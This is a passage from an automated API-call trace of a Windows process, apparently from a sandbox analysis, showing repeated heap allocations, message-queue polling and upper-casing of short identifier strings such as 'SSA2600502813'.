lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0212.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a75160 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0212.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0212.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0212.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0212.578] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0212.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0212.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a75160 [0212.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0212.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0212.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0212.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab308 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0212.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a75560 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0212.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0212.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0212.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0212.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0212.581] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0212.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0212.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0212.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0212.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0212.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0212.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0212.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0212.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0212.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0212.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0212.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0212.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.586] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0212.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1b8 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.587] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0212.587] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0212.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0212.587] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0212.588] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0212.588] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0212.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854818 [0212.588] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0212.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0212.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0212.589] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0212.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | 